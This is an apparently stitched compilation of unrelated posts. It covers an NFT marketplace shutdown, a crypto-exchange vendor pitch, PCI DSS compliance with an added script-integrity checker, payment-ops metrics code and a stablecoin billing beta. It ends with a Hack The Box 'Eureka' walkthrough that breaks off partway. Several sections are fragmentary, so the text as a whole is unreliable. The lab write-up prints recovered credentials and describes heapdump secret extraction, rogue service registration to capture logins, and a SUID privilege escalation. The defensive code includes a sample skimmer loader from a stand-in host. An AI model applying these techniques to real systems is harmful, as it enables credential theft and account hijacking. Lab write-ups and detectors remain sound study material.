Nifty Gateway, the marketplace that once helped bring NFT drops to a wider audience, will stop running its marketplace on February 23, 2026. The company put the site into a withdrawal-only mode the same day it made the announcement, and users were told they must move any remaining funds and NFTs off the platform before that date.
Withdrawal Window Opens
According to the company, withdrawal tools are available now. Reports note users can pull USD or ETH balances through a linked Gemini Exchange account or send funds to their bank via Stripe.
Emails with step-by-step instructions will be sent to account holders, and a shutdown notice already appears on the Nifty Gateway homepage. The aim, as described by the owner, is to let people retrieve what they own before the platform goes dark.
Today, we are announcing that the Nifty Gateway platform will be closing on February 23, 2026. Starting today, Nifty Gateway is in withdrawal-only mode.
Nifty Gateway was launched in 2020 with the vision of revolutionizing digital art. Since launching, Nifty supported dozens of…
Based on reports from Gemini, the closure is meant to let the parent firm concentrate on building one bigger app for customers. The move highlights how interest and trading activity in many NFT markets have cooled from the highs seen in earlier years.
Some collectors and artists are left scrambling to rehome items they once sold or stored on Nifty Gateway.
End Of An Early Player
Nifty Gateway helped make buying NFTs easier for people who preferred credit cards and familiar checkout flows. It launched as a high-profile marketplace and hosted major drops from well-known creators.
The platform supported hundreds of millions in sales at its peak and played a clear part in bringing NFT art into mainstream headlines. Its exit marks the end of an important chapter for that wave of marketplaces.
What Owners Must Do Now
Owners should check their inboxes for the official instructions, confirm where their tokens are stored, and move assets before the deadline. If NFTs are held in custodial wallets on the site, they must be transferred out to a wallet whose private keys the owner controls.
USD and ETH balances should be withdrawn or moved into a connected Gemini account if that option suits the owner. Waiting past the closure date will reduce options.
A Quiet Turning Point
For many collectors, this will feel like another sign that the early boom years have passed. For creators, the change raises questions about where drops and secondary sales will happen next.
Gemini says it will keep supporting NFTs through its other products, including the Gemini Wallet, but the specific ways that creators and buyers reconnect with those audiences will depend on new tools and services that arrive in the next months.
Cryptocurrency exchanges are the backbone of the digital asset economy. They enable users to buy, sell, and trade cryptocurrencies securely while supporting liquidity, price discovery, and market growth.
As the crypto market continues to mature, businesses entering this space or scaling existing platforms must make one critical decision early on:
Choosing the right cryptocurrency exchange development company.
The wrong partner can lead to security gaps, scalability issues, regulatory trouble, and delayed launches. The right one accelerates time-to-market, ensures compliance, and builds long-term competitive advantage.
This guide explores what to look for in a crypto exchange development company and why ITIO Innovex is a preferred choice for businesses worldwide.
Understanding Cryptocurrency Exchange Development Services
Cryptocurrency exchange development services cover building, customizing, and deploying secure platforms that let users trade digital assets efficiently.
The core features such a platform needs are outlined below.
Core Features of Cryptocurrency Exchange Development
1. Scalable Platform Architecture
A well-designed exchange must handle high transaction volumes while maintaining performance, uptime, and data integrity. Scalability is critical for future growth.
2. User Interface (UI) & User Experience (UX)
An intuitive, trader-friendly interface improves adoption, reduces friction, and enhances retention, especially for first-time users.
3. High-Performance Trading Engine
The trading engine is the heart of the exchange. It must support:
Fast order matching
Multiple order types
Real-time price updates
High concurrency
Security & Compliance: Non-Negotiables in Crypto Exchange Development
1. Advanced Security Measures
A reliable exchange integrates:
Multi-factor authentication (MFA) for user logins, withdrawals, and administrative access
Encryption of data in transit (TLS) and at rest, including customer records and key material
A cold and hot wallet architecture that keeps the bulk of customer funds in offline (cold) storage and only operational liquidity in internet-connected (hot) wallets
DDoS protection with continuous monitoring and alerting
2. Regulatory Compliance
Adherence to global standards such as:
AML (Anti-Money Laundering)
KYC (Know Your Customer)
is essential for legal operation and long-term trust.
Thinking of Launching a Crypto Exchange? Pause Here
Before investing heavily, a short technical review can save months of rework and costly mistakes.
Let's build a secure, scalable, and future-ready crypto trading platform together.
Conclusion
Choosing the best cryptocurrency exchange development company is a strategic decision that directly impacts security, scalability, and long-term success.
By evaluating experience, customization capabilities, compliance readiness, and technical support, businesses can avoid costly missteps. ITIO Innovex delivers all of this, making it a reliable partner for cryptocurrency exchange development in today's fast-evolving digital asset landscape.
In an era where digital payments dominate everyday transactions, from online shopping and mobile wallets to contactless in-store purchases, the security of cardholder data has never been more critical. The Payment Card Industry Data Security Standard (PCI DSS) is the global benchmark for protecting payment card data. Maintained by the PCI Security Standards Council (PCI SSC), it applies to any organization that stores, processes, or transmits cardholder data or sensitive authentication data.
1. Exploding Cyber Threats and Data Breaches
Cyberattacks targeting payment systems have surged. Ransomware, phishing, supply-chain compromises, and advanced persistent threats (APTs) are now routine. Non-compliant businesses face higher breach risk; industry studies have reported that compliant organizations experience up to 50% fewer incidents. A single breach can expose thousands of card records, leading to large-scale fraud and identity theft. PCI DSS enforces controls such as encryption of stored and transmitted account data, restricted access, and vulnerability management to reduce these risks.
2. Building and Maintaining CustomerΒ Trust
Consumers now prioritize security when choosing where to shop. A visible commitment to PCI DSS signals reliability; think "Your card details are safe with us." In contrast, a breach erodes trust overnight, resulting in lost customers, negative reviews, and long-term reputational damage. Compliant businesses often see higher conversion rates and loyalty because customers feel protected.
3. Avoiding Severe Financial and Legal Penalties
Non-compliance carries heavy costs:
Fines from card brands (up to $100,000+ per month in severe cases, typically assessed against the acquiring bank and passed on to the merchant)
Increased transaction fees
Liability for fraud losses and breach-related expenses (legal fees, notifications, credit monitoring)
Potential loss of payment processing privileges
Enforcement has also tightened under v4.0.1, whose requirements include MFA for all access into the cardholder data environment (not only for administrators), stronger password rules (a 12-character minimum where passwords are used), anti-phishing mechanisms, and ongoing monitoring of security controls. Acquirers and card brands are less tolerant of lapses.
4. Enabling Secure Digital Innovation
Modern businesses rely on cloud services, APIs, e-commerce platforms, and third-party processors. PCI DSS v4.0.1 adds flexibility (the customized approach and targeted risk analyses) while raising the bar on emerging risks such as payment page skimming (requirements 6.4.3 and 11.6.1 call for an inventory of payment page scripts, assurance of their integrity, and detection of unauthorized changes) and weak authentication. Compliance lets organizations adopt new technology without exposing card data.
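To make the payment page requirements concrete, here is an added example (not part of the original article) of the kind of check 6.4.3 and 11.6.1 ask for: every script on the checkout page is compared against a business-justified inventory, external scripts must carry the expected Subresource Integrity hash, and inline scripts are hashed and matched the same way. The PSP URL, the allowlist, and the sample page are constructed; in practice the page is fetched from the live checkout on a schedule.

```python
"""Payment-page script inventory and integrity check (PCI DSS v4.0.1 reqs 6.4.3 / 11.6.1).

Added example, not from the article. The allowlist, URLs and page below are
constructed; in practice the allowlist is the authorised script inventory and
the page is fetched from the live checkout."""
import base64
import hashlib
from html.parser import HTMLParser


def sri_digest(content: bytes) -> str:
    """SHA-384 in the Subresource Integrity format browsers enforce."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


# Constructed inventory: each authorised external script with its expected
# integrity value, plus the digests of authorised inline scripts.
PSP_JS = "https://js.example-psp.test/v3/checkout.js"  # hypothetical PSP library
ALLOWLIST = {
    "external": {PSP_JS: sri_digest(b"/* constructed stand-in for checkout.js */")},
    "inline": {sri_digest(b"initCheckout({amount: 100, currency: 'USD'});")},
}

# Constructed checkout page: one authorised external script, one authorised
# inline script, and one injected skimmer loader that is not in the inventory.
CONSTRUCTED_PAGE = f"""
<html><body>
<script src="{PSP_JS}" integrity="{ALLOWLIST['external'][PSP_JS]}" crossorigin="anonymous"></script>
<script>initCheckout({{amount: 100, currency: 'USD'}});</script>
<script src="https://cdn.evil-analytics.test/a.js"></script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collects every <script> on the page with its src, integrity attribute and body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_payment_page(html: str, allowlist: dict) -> list:
    """One finding per script that is outside the inventory or lacks the expected integrity."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            expected = allowlist["external"].get(s["src"])
            if expected is None:
                findings.append(f"unauthorised external script: {s['src']}")
            elif s["integrity"] != expected:
                findings.append(f"integrity missing or changed: {s['src']}")
        elif sri_digest(s["body"].strip().encode()) not in allowlist["inline"]:
            findings.append("unauthorised or modified inline script")
    return findings


if __name__ == "__main__":
    for finding in audit_payment_page(CONSTRUCTED_PAGE, ALLOWLIST):
        print("ALERT:", finding)
```

Run against the constructed page this reports only the injected loader; strip the integrity attribute from the PSP script and it reports that too, which is the tamper case 11.6.1 is after. The digests double as the values to put in the `integrity` attributes themselves, so the inventory and the browser enforce the same thing.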
5. A Foundation for Broader Cybersecurity Maturity
PCI DSS isn't only about cards: its 12 requirements, grouped under six goals (build and maintain a secure network and systems, protect account data, maintain a vulnerability management program, implement strong access control measures, regularly monitor and test networks, and maintain an information security policy), strengthen overall security posture. Many organizations use it as a baseline when aligning with GDPR, HIPAA, or ISO 27001.
Bottom Line in 2026
In a world of nonstop digital transactions and sophisticated cybercriminals, PCI DSS compliance protects customers, safeguards revenue, and demonstrates responsibility. It's no longer a "checkbox"; it's a strategic imperative for any business handling payments.
If your organization processes card data, assess your current status against v4.0.1 requirements today. Non-compliance risks far outweigh the effort of achieving it.
What challenges have you faced with PCI DSS? Share in the comments; I'd love to discuss real-world tips!
I work in payment infrastructure, and I keep seeing the same pattern across startups, marketplaces, and PSP-style builds.
Teams spend weeks perfecting checkout.
Then they get blindsided by payouts, disputes, mismatched balances, and "why didn't I get paid?" emails.
Not because the payment gateway failed. But because KYB → risk → routing → settlement → reconciliation was treated like a straight line.
It isn't.
It's a system, one that has to stay consistent when real money, real merchants, refunds, chargebacks, delayed webhooks, and regulatory scrutiny enter the picture.
If you're building any of the following, this applies directly to you:
A marketplace (split payouts, vendor settlements)
A SaaS product (subscriptions, prorations, refunds)
Even a spreadsheet-driven exception queue is better than
"We'll figure it out later."
Later is expensive.
5. Routing Without Monitoring Becomes Expensive
Routing can improve approvals and reduce cost, but only if you monitor it.
Every week, you should be able to answer:
Which route is degrading?
Where are declines increasing?
Which region or MCC is risky?
What changed after the last release?
Track these weekly (even in Google Sheets):
Approval rate
Decline reason distribution
Dispute rate
Refund rate
Settlement delay rate
Reconciliation exception rate
Ten minutes of review here saves months of cleanup later.
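As an added example (not from the original post), here is the weekly review above expressed as code: per-route approval rate and decline-reason distribution, a week-over-week check that flags a degrading route, and a reconciliation of the acquirer's settlement file against the internal ledger that yields the dispute, refund, settlement-delay and exception rates. The transactions, routes and settlement rows are constructed; the field names are assumptions, not any processor's schema.

```python
"""Weekly payment-ops metrics and settlement reconciliation over constructed data.

Added example, not from the post. Every record, route name and settlement row
below is invented for illustration; field names are assumptions."""
from collections import Counter, defaultdict


def txn(tid, week, route, region, status, reason=None, amount=100.0):
    return {"id": tid, "week": week, "route": route, "region": region,
            "status": status, "reason": reason, "amount": amount}


TRANSACTIONS = [
    # week 1: both routes healthy
    txn("a1", 1, "acq-A", "NG", "approved"), txn("a2", 1, "acq-A", "NG", "approved"),
    txn("a3", 1, "acq-A", "US", "approved"), txn("a4", 1, "acq-A", "US", "approved"),
    txn("b1", 1, "acq-B", "NG", "approved"), txn("b2", 1, "acq-B", "NG", "approved"),
    txn("b3", 1, "acq-B", "US", "approved"), txn("b4", 1, "acq-B", "US", "declined", "insufficient_funds"),
    # week 2: route acq-A starts declining after a release
    txn("a5", 2, "acq-A", "NG", "approved", amount=120.0), txn("a6", 2, "acq-A", "NG", "approved", amount=80.0),
    txn("a7", 2, "acq-A", "US", "declined", "do_not_honor"), txn("a8", 2, "acq-A", "US", "declined", "do_not_honor"),
    txn("b5", 2, "acq-B", "NG", "approved"), txn("b6", 2, "acq-B", "NG", "approved"),
    txn("b7", 2, "acq-B", "US", "approved"), txn("b8", 2, "acq-B", "US", "approved"),
]
DISPUTES = {"a5"}          # chargebacks received, by transaction id
REFUNDS = {"b5"}
SETTLEMENT_WEEK2 = [       # constructed acquirer settlement file for week 2
    {"id": "a5", "amount": 120.0},
    {"id": "a6", "amount": 79.0},    # amount differs from the internal record
    {"id": "b5", "amount": 100.0}, {"id": "b6", "amount": 100.0}, {"id": "b7", "amount": 100.0},
    {"id": "zz1", "amount": 15.0},   # unknown to our ledger
]                                    # b8 is approved internally but not yet settled


def route_metrics(txns, week):
    """Approval rate and decline-reason distribution per route for one week."""
    per_route = defaultdict(lambda: {"attempts": 0, "approved": 0, "declines": Counter()})
    for t in (t for t in txns if t["week"] == week):
        m = per_route[t["route"]]
        m["attempts"] += 1
        if t["status"] == "approved":
            m["approved"] += 1
        else:
            m["declines"][t["reason"]] += 1
    return {r: {"approval_rate": m["approved"] / m["attempts"],
                "decline_reasons": dict(m["declines"])} for r, m in per_route.items()}


def degraded_routes(txns, week, drop=0.15):
    """Routes whose approval rate fell by at least `drop` versus the previous week."""
    prev, cur = route_metrics(txns, week - 1), route_metrics(txns, week)
    return sorted(r for r in cur
                  if r in prev and prev[r]["approval_rate"] - cur[r]["approval_rate"] >= drop)


def reconcile(txns, week, settlement, disputes, refunds):
    """Match the settlement file to internal approvals; every mismatch is an exception to work."""
    approved = {t["id"]: t for t in txns if t["week"] == week and t["status"] == "approved"}
    exceptions, settled_ids = [], set()
    for row in settlement:
        t = approved.get(row["id"])
        if t is None:
            exceptions.append(f"{row['id']}: settled but unknown internally")
            continue
        settled_ids.add(row["id"])
        if abs(t["amount"] - row["amount"]) > 0.005:
            exceptions.append(f"{row['id']}: internal {t['amount']} != settled {row['amount']}")
    unsettled = sorted(set(approved) - settled_ids)
    n = len(approved)
    return {
        "dispute_rate": len(disputes & set(approved)) / n,
        "refund_rate": len(refunds & set(approved)) / n,
        "settlement_delay_rate": len(unsettled) / n,
        "reconciliation_exception_rate": len(exceptions) / len(settlement),
        "unsettled": unsettled,
        "exceptions": exceptions,
    }


if __name__ == "__main__":
    print("degrading routes:", degraded_routes(TRANSACTIONS, 2))
    print(route_metrics(TRANSACTIONS, 2))
    print(reconcile(TRANSACTIONS, 2, SETTLEMENT_WEEK2, DISPUTES, REFUNDS))
```

The point of keeping the exceptions as a list rather than a count is that it is the exception queue the post argues for: each line is something a person has to resolve, and the rate tells you whether that queue is growing.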
A 10-Minute Sanity Check for Your KYB → Settlement System
If you're building payouts or payment rails, answer these honestly:
Do we have merchant tiers with rules per tier?
Can we pause or hold payouts based on risk triggers?
Do we have a dispute workflow (evidence, deadlines, owner)?
Are payout rules clearly documented?
Can we reconcile settlement files to internal states?
Do we review approvals, declines, and disputes weekly?
If you answered "no" to two or more, your product may work today, but you're likely accumulating operational debt that becomes very expensive later.
Why I'm Sharing This
Most payment content focuses on APIs and integrations.
But the hard part is keeping money movement and operational truth aligned, consistently, under pressure, at scale.
These are the lessons teams usually learn after a painful incident. I'm sharing them so fewer teams have to.
I keep a one-page KYB → Settlement scorecard I use to sanity-check payment setups.
If you want it, comment with:
What you're building (marketplace / SaaS / PSP / crypto rails)
Your biggest headache (onboarding, disputes, payout delays, reconciliation, declines)
I'll reply with the scorecard and the top 2–3 gaps to fix first for your model.
If enough people ask, I'll publish the scorecard as a follow-up post.
Over the past three weeks, I've sent 50+ emails to Nigerian businesses: fashion designers in Lagos, freelance developers, gadget retailers, drone wholesalers, and crowdfunding platforms.
The feedback has been surprisingly consistent.
These aren't isolated complaints. They're systemic infrastructure gaps.
The pattern is clear:
Businesses are losing 10–15% to international payment fees
Freelancers are watching Naira devaluation eat their savings in real time
E-commerce businesses are dealing with failed cross-border transactions
Operations teams face manual reconciliation nightmares
There's constant fear of frozen accounts when accepting international payments
Traditional payment rails weren't built for this moment. Banks can't solve it. Payment processors won't solve it. Someone has to create the alternative.
BillingBase is non-custodial crypto billing infrastructure for global businesses.
Let me break down what that actually means:
Non-custodial means payments go directly to YOUR wallet. We never hold your funds. We don't control your money. We don't have the ability to freeze your account. You maintain complete custody while we handle the infrastructure. (One caveat worth knowing: this removes platform-side freezes, but issuers of centrally managed stablecoins such as USDT and USDC retain the ability to freeze addresses at the token-contract level.)
Crypto billing infrastructure means we provide the payment primitives you're already familiar with (checkout links, subscriptions, refunds, webhooks, invoicing), except they work with stablecoins instead of traditional payment rails.
For Nigerian businesses, this means we understand the specific problems you face: Naira devaluation, international payment friction, high platform fees, and the need for dollar-denominated earnings that hold their value.
Here's what you can do with BillingBase:
Accept stablecoin payments: USDT, USDC, DAI, and CNGN (Naira-pegged)
Use familiar tools: Payment links, recurring subscriptions, one-time payments, refunds, webhooks, and a dashboard to track everything
Get built-in protection: Chainalysis wallet screening, transaction-level risk checks, KYB verification, and audit trails for compliance
Why We're Starting with a Beta
We don't have all the answers yet.
What we know:
Nigerian businesses need better cross-border payments. Naira devaluation makes dollar earnings critical. Platform fees (Upwork's 15%, Stripe's 3.9%, PayPal's conversion markups) are too high. International customers increasingly pay with stablecoins. Operations teams need reconciliation tools that traditional banks don't provide.
What we need to validate:
Core features: Which payment primitives matter most? Do fashion designers prioritize deposit handling or subscription billing? Do freelancers want simple payment links or full API integration? Where's the acceptable onboarding friction threshold?
Compliance: What documentation feels reasonable versus invasive? KYB is necessary, but where's the line between thorough and annoying?
Infrastructure: Which blockchains: Base (lowest fees), Polygon (widely supported), Arbitrum (fast settlement)? Do businesses care, or just want "cheapest and fastest"? USDC (dollar-pegged) or CNGN (Naira-pegged)?
Integrations: QuickBooks? Xero? Google Sheets? Slack notifications when payments arrive?
Questions only real usage can answer:
How do designers handle deposits versus final payments?
Do freelancers prefer shareable links or automated invoicing? What reporting do finance teams need?
How often do merchants convert stablecoins to Naira?
What's the right balance between automated risk controls and merchant control?
We can't answer these in a vacuum. We need real businesses using BillingBase with real customers.
We're looking for specific businesses where stablecoin payments solve real problems.
1. SME Businesses with Global Clients
Fashion designers, bridal boutiques, custom clothiers, bespoke service providers with international clients who ship worldwide or provide remote services.
Your pain: 3–7 day payment delays, high cross-border fees, difficult deposit handling, currency conversion losses.
What you get: Instant stablecoin settlement, payment links for deposits/finals, dollar-denominated earnings, free integrated website during beta.
2. Freelancers & Service Providers
Developers, designers, consultants, educators working directly with clients or through Upwork/Fiverr/Toptal.
Your pain: 10–15% platform fees, poor PayPal conversion rates, dollar invoices settled in devalued Naira, no professional low-cost direct payment option.
What you get: 0.5% transaction fees, payment link dashboard, dollar earnings protected from devaluation, automatic receipts and audit trails.
Your pain: Slow, expensive wire transfers, high cross-border fees, poor reporting, and difficulty tracking recurring contributions.
What you get: Donation links (one-time/recurring), lower fees, instant international contributions via stablecoins, and clean reporting for finance teams and donors.
What we're NOT looking for (yet):
High-volume enterprises: If you're processing 10,000 transactions per day, we're not ready for you. We're optimizing for businesses with 10–500 transactions per month during beta.
Businesses requiring instant Naira conversion: We don't provide off-ramp services yet. You'll need your own method to convert stablecoins to Naira if needed (P2P platforms like Binance, Bybit, or local exchanges work well).
Companies needing white-label solutions: If you want to rebrand BillingBase as your own product, that's not our focus right now.
Anyone expecting zero bugs: This is a beta. There will be rough edges. If you need production-perfect software on day one, wait for our public launch later this year.
What Beta Participants Get
1. Free Integration & Setup
No setup fees: Most payment platforms charge $500–$2,000 for integration. We don't.
No monthly subscription during beta: Use BillingBase for free while we're testing.
Transaction fees waived for first 90 days (or first 100 transactions): Whichever comes first. After that, standard fees apply (0.5% or lower depending on volume).
One-on-one onboarding support: We'll walk you through wallet setup, dashboard usage, and first transactions. No "figure it out yourself" documentation dumps.
2. Custom Solutions Based on Your Business Type
For fashion designers: We'll build you a one-pager website with integrated payment links. Free during beta. Professional design. Consultation booking system if needed.
For e-commerce businesses: We'll integrate the BillingBase API directly with your existing website. Custom checkout flow. Webhook setup. Testing support.
For freelancers: Payment link dashboard optimized for invoicing. Easy sharing via email, WhatsApp, or social media. Automatic receipt generation.
For educators: Subscription billing for courses or memberships. Payment links for one-time consultations or content. Recurring payment automation.
3. Direct Access to the Team
Weekly feedback calls (optional): Tell us what's working and what's broken.
Slack/WhatsApp channel with founders: Direct line to Ngozi and the team. No support ticket black holes.
Priority bug fixes: If something breaks, we fix it fast. Beta participants get priority.
Your input shapes the product roadmap: We're not building in isolation. If you need a feature, we'll consider adding it based on beta feedback.
4. Early Mover Advantage
Lifetime discounted pricing after beta: When we launch publicly, you'll pay less than new customers, forever.
Featured case studies (with permission): If you're willing, we'll showcase how you're using BillingBase. Good for your brand, good for ours.
First access to new features: New integrations, reporting tools, or blockchain support? Beta participants see it first.
Referral program with revenue share: Refer other businesses to BillingBase and earn a percentage of their transaction fees.
What We're Asking From You
This isn't passive testing. If you just want to "try it out and see," that's not what we need.
Time Commitment:
30–60 minutes: Initial setup (wallet, KYB verification, dashboard walkthrough, first test transaction)
24–48 hour response time: When we ask "Can you try this again and tell us what happened?"
5–10 minutes monthly: Survey on feature usage and pain points
Honesty Requirement:
We need brutal feedback, not polite validation.
Tell us what's confusing, broken, or doesn't fit your workflow. Share what your customers say, positive and negative. If onboarding felt complicated, the dashboard doesn't make sense, or a feature exists but you don't understand why you'd use it, tell us. Screenshots help. Screen recordings are better.
We're not looking for cheerleaders. We're looking for honest partners who'll tell us when we're wrong.
Real Usage:
Use this with real customers. Test transactions catch bugs, but real revenue matters more. We can't improve what we don't see in production.
Send a payment link to a real client. Use BillingBase for a real deposit. Integrate it and see if customers choose the crypto option. We're not asking you to bet your entire business on this, but we need real scenarios to see what happens when money is on the line.
Patience:
There will be bugs; we'll fix them fast. Some features won't exist yet; we're prioritizing based on feedback. Documentation might be incomplete; we're improving it weekly.
Beta means "we're still learning." If you need production-perfect software on day one, wait for our public launch.
In this writeup, we will explore the βEurekaβ machine from Hack The Box, categorised as a Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the βEurekaβ machine from Hack The Box by achieving the following objectives:
User Flag:
During enumeration, we discovered Spring Boot Actuator endpoints, including /actuator/heapdump, which revealed plaintext credentials for oscar190. We logged in to SSH as oscar190, but found the home directory empty. The application.properties file revealed Eureka credentials (EurekaSrvr:0scarPWDisTheB3st), which allowed us to access the Eureka dashboard on port 8761. By registering a malicious microservice, we retrieved miranda.wise credentials and captured the user flag from user.txt.
Root Flag:
For privilege escalation, the vulnerable log_analyse.sh script allowed command injection, enabling creation of a SUID bash shell in /tmp/bash. Execution of this shell provided root access, and the root flag was obtained from /root/root.txt.
Enumerating the Eureka Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.66
Nmap Output:
[dark@parrot]-[~/Documents/htb/eureka]$ nmap -sC -sV -oA initial 10.10.11.66
# Nmap 7.94SVN scan initiated Sun Aug 24 03:30:10 2025 as: nmap -sC -sV -oA initial 10.10.11.66
Nmap scan report for 10.10.11.66
Host is up (0.046s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 24 03:30:21 2025 -- 1 IP address (1 host up) scanned in 10.99 seconds
Analysis:
Port 22 (SSH): Secure Shell service (OpenSSH 8.2p1) for remote access.
Port 80 (HTTP): Web server (nginx 1.18.0) hosting furni.htb.
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
Feroxbuster directory enumeration identified the following endpoints:
Analysis:
/actuator/heapdump: full application heap dump (very sensitive, ~76 MB).
The heap dump is usually the biggest goldmine here: it can contain hard-coded credentials, JWT secrets, API keys, or session tokens that were in memory when the dump was taken.
Web Application Exploration:
The website interface appears to be a standard design showcasing a Modern Interior Design Studio.
Create a new user account
Proceed by registering a new account through the site's sign-up form; the form requires a password of at least 10 characters.
Logging in with the newly created account returned only a "bad credentials" error, so the registration path led no further.
Extracting oscar190 Credentials from the Heapdump
Download the heap dump by requesting the /actuator/heapdump endpoint directly in the browser.
To analyze the downloaded heapdump, run the strings command and pipe the output into grep to look for potential credentials. For example, using strings heapdump.hprof | grep -i "password=" will filter for any occurrences of the keyword password= within the dump. If no useful results are found, the search can be expanded with broader patterns such as pass, user, token, secret, or key to uncover sensitive information like database passwords, API keys, or authentication tokens stored in memory. This approach provides a quick way to extract valuable data from the heapdump before performing deeper analysis with tools like Eclipse MAT.
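The strings-and-grep triage described above, as an added example in Python (not the author's commands), so the same first pass can be scripted and its hits redacted for a report. SAMPLE_DUMP is a constructed stand-in for the .hprof file; the property names and values in it are invented and are not the real credentials from the box.

```python
"""Credential triage over a heap dump: the Python equivalent of strings | grep -i.

Added example, not from the writeup. SAMPLE_DUMP is a constructed stand-in for
the .hprof file; its property names and values are invented."""
import re

SAMPLE_DUMP = (
    b"JAVA PROFILE 1.0.2\x00\x00\x00\x01\x9f"
    b"spring.datasource.username=oscar190\x00\xff\xfe\x00"
    b"spring.datasource.password=ExamplePw-NotReal\x00\x00\x10"
    b"server.port=8080\x00\x02\x00"
    b"Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.constructed\x00\x7f"
    b"jwt.secret=constructed-signing-key\x00\x00ab\x00"
)

# Keys worth a first look; broaden to user/pass/key when this returns nothing.
SENSITIVE_KEY = re.compile(
    r"(password|passwd|pwd|secret|token|api[_-]?key|authorization)\s*[:=]", re.I)


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII of at least min_len bytes (GNU strings' default is 4)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def grep_strings(blob: bytes, regex: str) -> list:
    """strings | grep -i <regex>, for the broader follow-up searches."""
    pat = re.compile(regex, re.I)
    return [s for s in extract_strings(blob) if pat.search(s)]


def find_credentials(blob: bytes) -> list:
    """The first-pass search for credential-looking key/value strings."""
    return [s for s in extract_strings(blob) if SENSITIVE_KEY.search(s)]


def redact(s: str) -> str:
    """Keep the key, mask the value, so hits can go into a report safely."""
    sep = "=" if "=" in s else ":"
    key, found, value = s.partition(sep)
    return f"{key}{found}{'*' * min(len(value.strip()), 8)}" if found else s


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_DUMP):
        print(redact(hit))
```

Once the key names are known, the same extract_strings output can be grepped for the surrounding property names (datasource URL, Eureka client settings) to see which service each credential belongs to before trying it anywhere.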
A full TCP port scan (nmap -p-) should also be run, since the default top-1000 scan above reported only ports 22 and 80 and further services may be exposed on the target system.
Attempting Access to oscar190 via Eureka Dashboard and SSH
Trying the recovered oscar190 credentials against the Eureka dashboard failed; every login attempt was rejected.
We used pwncat-cs to test the recovered credentials against SSH. The login was successful, and we gained remote access to the target system.
Enumeration as oscar190
After gaining access, we inspected oscar190's home directory. It was empty and contained no useful files for further exploitation.
We also checked for SUID binaries on the system, but found no unusual or exploitable ones.
During enumeration, we found a notable file at ./web/Furni/src/main/resources/application.properties containing credentials, among them the password already recovered for oscar190.
Most importantly, under the Eureka section we found that the Eureka server uses embedded credentials:
Username: EurekaSrvr
Password: 0scarPWDisTheB3st
These credentials differ from oscar190's. They may be valid for the Eureka dashboard (port 8761) or reused on other services such as SSH, MySQL, or the web portal.
Accessing Spring Eureka Dashboard on Port 8761 Using Discovered Credentials
The newly discovered credentials (EurekaSrvr:0scarPWDisTheB3st) were tested against the Eureka service on port 8761. Authentication succeeded and granted access to the Spring Eureka dashboard, which lists the registered microservices and the instances behind each of them.
Monitoring System Activity and Command Execution with pspy64
The pspy64 output revealed a scheduled task run by root that uses curl to send a POST request to http://furni.htb/login. The request is crafted to resemble a normal browser login, with headers such as Accept, Content-Type, User-Agent, and a session cookie included. Most importantly, the POST data is not hardcoded in the command but read from the temporary file /tmp/tmp.hJ3yAWDvEW. If that file were writable or replaceable by a lower-privileged user, it might be possible to inject malicious data into the request. Just as important, the login request itself carries a user's credentials through the public web entry point, so whatever service ends up handling /login sees them in the clear.
Cloud-Gateway Enumeration and Insight
During enumeration, a directory named cloud-gateway was discovered, which stands out as it is not typically present in standard web application structures. Given its uncommon presence, this directory warrants deeper inspection to determine whether it contains exploitable configurations or hidden endpoints.
The cloud-gateway directory was identified within the application files, which is uncommon in typical setups and indicates the use of Spring Cloud Gateway for routing and service communication. Such directories often contain sensitive configuration files, route definitions, or embedded credentials, making it an important target for closer inspection during enumeration.
Analysing the application.yaml Configuration File
The request is routed to the user-management-service component, located under /var/www/web, for the /login path. Authentication requests to /login are therefore forwarded internally to user-management-service, which handles user validation and credential processing. Because Spring Cloud Gateway resolves that service through Eureka, the gateway will send /login traffic, including the root cron job's login POST, to whichever instance Eureka currently lists for USER-MANAGEMENT-SERVICE.
HTTP Login Endpoint Hijacking via User-Management-Service
Inside the user-management-service directory, several files and subdirectories were identified, indicating this component is likely responsible for handling authentication and account-related functionality within the application. Since it sits directly under /var/www/web, its contents may include configuration files, source code, or compiled application resources that could expose sensitive information such as database credentials, API keys, or logic flaws.
The files discovered within the user-management-service directory were copied over to the attackerβs machine for further offline analysis. This allows deeper inspection of configuration details, source code, and potential hardcoded secrets without the risk of altering the target environment.
The Eureka instance registration document (instance.xml, alongside the application.properties and Eureka-related configuration found here) contains fields such as <instanceId>, <hostName>, <ipAddr>, <port>, <homePageUrl>, <statusPageUrl>, and <healthCheckUrl>. Setting these to the attacker's IP address and port registers a rogue instance, so that traffic meant for the legitimate service is routed to the attacker instead.
Retrieving miranda.wise Credentials and Capturing User Flag
